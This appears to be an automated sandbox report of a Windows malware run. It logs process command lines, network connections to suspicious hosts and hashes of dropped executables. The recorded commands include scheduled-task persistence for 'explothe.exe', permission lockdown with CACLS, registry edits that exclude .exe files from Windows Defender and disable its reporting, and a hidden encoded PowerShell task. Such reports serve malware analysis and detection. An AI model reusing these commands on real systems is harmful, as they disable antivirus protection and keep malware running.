"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ffa96e146f8,0x7ffa96e14708,0x7ffa96e14718

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4068 -ip 4068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,17538133617654996007,11123633969690294482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,17538133617654996007,11123633969690294482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1

C:\Windows\system32\BackgroundTaskHost.exe

"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2qF343zA.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2qF343zA.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,3225087135232485515,4002760096935667305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\2211.exe

C:\Users\Admin\AppData\Local\Temp\2211.exe

C:\Users\Admin\AppData\Local\Temp\2C91.exe

C:\Users\Admin\AppData\Local\Temp\2C91.exe

C:\Users\Admin\AppData\Local\Temp\2F71.exe

C:\Users\Admin\AppData\Local\Temp\2F71.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3709.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3392 -ip 3392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 796

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3861.tmp\Install.exe

.\Install.exe /MKdidA "385119" /S

C:\Users\Admin\AppData\Local\Temp\3D8B.exe

C:\Users\Admin\AppData\Local\Temp\3D8B.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-AT01F.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AT01F.tmp\LzmwAqmV.tmp" /SL5="$8023C,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i

C:\Program Files (x86)\Drive Tools\zDriveTools.exe

"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\697E.exe

C:\Users\Admin\AppData\Local\Temp\697E.exe

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gmnfvIFNu" /SC once /ST 05:13:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gmnfvIFNu"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5996 -ip 5996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 584

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 126.177.238.8.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.68.249:80 77.91.68.249 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 249.68.91.77.in-addr.arpa udp
RU 193.233.255.73:80 193.233.255.73 tcp
US 8.8.8.8:53 73.255.233.193.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 142.250.179.141:443 accounts.google.com tcp
IE 163.70.151.35:443 www.facebook.com tcp
FI 77.91.124.1:80 77.91.124.1 tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
IE 163.70.151.21:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
NL 81.161.229.93:80 81.161.229.93 tcp
US 8.8.8.8:53 93.229.161.81.in-addr.arpa udp
FI 77.91.124.71:4341 tcp
US 8.8.8.8:53 71.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
BG 171.22.28.213:80 171.22.28.213 tcp
US 8.8.8.8:53 stim.graspalace.com udp
US 188.114.96.0:80 stim.graspalace.com tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 213.28.22.171.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
FI 77.91.124.86:19084 tcp

Files

memory/2380-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2380-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3324-2-0x0000000002C40000-0x0000000002C56000-memory.dmp

memory/2380-3-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CDCF.exe

MD5 77b123be5dd076e1eb33e6b76bc2d7db
SHA1 7087410d1f0dc060b80044ad5b63fc77ca60ec32
SHA256 32f43f514377ea626a7f5025cde471e6e1543b46c72193c7c312a7c634aee3d9
SHA512 6977771a6165d15149a417d357b5b295936d9b30a130f45b3e032a7d5d93808f2bffaca18ce0c89b6ef7de23d52ae5db23599d55c3de0917a60c2141abb46091

C:\Users\Admin\AppData\Local\Temp\CDCF.exe

MD5 77b123be5dd076e1eb33e6b76bc2d7db
SHA1 7087410d1f0dc060b80044ad5b63fc77ca60ec32
SHA256 32f43f514377ea626a7f5025cde471e6e1543b46c72193c7c312a7c634aee3d9
SHA512 6977771a6165d15149a417d357b5b295936d9b30a130f45b3e032a7d5d93808f2bffaca18ce0c89b6ef7de23d52ae5db23599d55c3de0917a60c2141abb46091

C:\Users\Admin\AppData\Local\Temp\CF57.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\CF57.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe

MD5 4a824f9923748edaeca424c8bbd23fd4
SHA1 95b44ff470156ec9ca6769a7e691fc3cc24c6c1c
SHA256 2f06ecbe89b6b075d722851f42cf60fcfa3408242940f622caba631d6ea6dbc8
SHA512 80257e9db8f7bc1b4e6e5e121afac3475c9ab283272134156b94398f922f16352e5d7ee67df2d143583868df9552b31bd4fc3c66b3438c4ccc307e312e614af1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\wT5GD0kZ.exe

MD5 4a824f9923748edaeca424c8bbd23fd4
SHA1 95b44ff470156ec9ca6769a7e691fc3cc24c6c1c
SHA256 2f06ecbe89b6b075d722851f42cf60fcfa3408242940f622caba631d6ea6dbc8
SHA512 80257e9db8f7bc1b4e6e5e121afac3475c9ab283272134156b94398f922f16352e5d7ee67df2d143583868df9552b31bd4fc3c66b3438c4ccc307e312e614af1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe

MD5 59abcdcb5919a41327c61dc6550eab29
SHA1 cc75b6641f9e73f25cb6cbd798848d759327bdd2
SHA256 7b8141b8fcaed71fe65dc3cfeb559027504fec1fde54cd9dc886810110d74d2b
SHA512 73d91f7da9d4fe230eb82a2f79afe22c2b44a84e4f9bf1803a7b6c1b0b683ff3e85ce765ab7b673e53436b0c26c9e6b7131000cc95f8fe830fedaadc1ba210d2

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\gN5vH6ds.exe

MD5 59abcdcb5919a41327c61dc6550eab29
SHA1 cc75b6641f9e73f25cb6cbd798848d759327bdd2
SHA256 7b8141b8fcaed71fe65dc3cfeb559027504fec1fde54cd9dc886810110d74d2b
SHA512 73d91f7da9d4fe230eb82a2f79afe22c2b44a84e4f9bf1803a7b6c1b0b683ff3e85ce765ab7b673e53436b0c26c9e6b7131000cc95f8fe830fedaadc1ba210d2

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe

MD5 d5e83e6829bc09e3eabd25e69cc80b6e
SHA1 4b2f62815708d9a07b68965435a1db48e62128bd
SHA256 1e707616bfd0c58ac7f16c17e17e0ab8a7287cbd1f6e8546155b4af4141ddd6f
SHA512 8080d4e5abfe00e013e7b9b1050759bc3fbbcfd4437fd3e84e5694956a563d13a8544ea126c79581aa8f1a6cad027a3ccc2339d0720efd68b5cb3b256848c37e

C:\Users\Admin\AppData\Local\Temp\D052.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

C:\Users\Admin\AppData\Local\Temp\D15D.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\D15D.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\cm2yB9Ts.exe

MD5 d5e83e6829bc09e3eabd25e69cc80b6e
SHA1 4b2f62815708d9a07b68965435a1db48e62128bd
SHA256 1e707616bfd0c58ac7f16c17e17e0ab8a7287cbd1f6e8546155b4af4141ddd6f
SHA512 8080d4e5abfe00e013e7b9b1050759bc3fbbcfd4437fd3e84e5694956a563d13a8544ea126c79581aa8f1a6cad027a3ccc2339d0720efd68b5cb3b256848c37e

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe

MD5 4aa164e033ca390b14017d4ac1c05c25
SHA1 bbed2b5b0ceecd241c2a92726c8e4c54b6cd5043
SHA256 b34956f3f80685245b739a19c04b527b6ea0020774c2af1d0aff4f16fa76d974
SHA512 d195d3626b9322b4ab3669efba9dbb7884f50449b72576ec5f9c73d1290bdf2a621c399a733fcfce77e7692c020ff1f9f197fd1d9837330ee6a0ca556ebdb8a6

C:\Users\Admin\AppData\Local\Temp\D229.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

memory/4104-61-0x00000000008A0000-0x00000000008DE000-memory.dmp

memory/3644-62-0x0000000000660000-0x000000000066A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe

MD5 11f02c17fcba9331d484e453a6896c6f
SHA1 30f454376b86a133d285cf86f8b20817902dce7f
SHA256 642d157dee3b3bc39bc8d2feed7babe5cc58d02da6c5288fcc72d28daeeaffc8
SHA512 749cd88679120034eac464f65f20063de4243798f0a70fbafd3170c0b73e73b6f683865faceaca9bfdf2a7c9d6190812fa403debd70a34c81c46a6ea21988ee0

memory/4104-66-0x0000000073CD0000-0x0000000074480000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Ai10ld4.exe

MD5 11f02c17fcba9331d484e453a6896c6f
SHA1 30f454376b86a133d285cf86f8b20817902dce7f
SHA256 642d157dee3b3bc39bc8d2feed7babe5cc58d02da6c5288fcc72d28daeeaffc8
SHA512 749cd88679120034eac464f65f20063de4243798f0a70fbafd3170c0b73e73b6f683865faceaca9bfdf2a7c9d6190812fa403debd70a34c81c46a6ea21988ee0

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\lK7BL3Jo.exe

MD5 4aa164e033ca390b14017d4ac1c05c25
SHA1 bbed2b5b0ceecd241c2a92726c8e4c54b6cd5043
SHA256 b34956f3f80685245b739a19c04b527b6ea0020774c2af1d0aff4f16fa76d974
SHA512 d195d3626b9322b4ab3669efba9dbb7884f50449b72576ec5f9c73d1290bdf2a621c399a733fcfce77e7692c020ff1f9f197fd1d9837330ee6a0ca556ebdb8a6

memory/4104-67-0x0000000007CE0000-0x0000000008284000-memory.dmp

memory/3644-68-0x0000000073CD0000-0x0000000074480000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D229.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

memory/4104-69-0x00000000077D0000-0x0000000007862000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D508.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
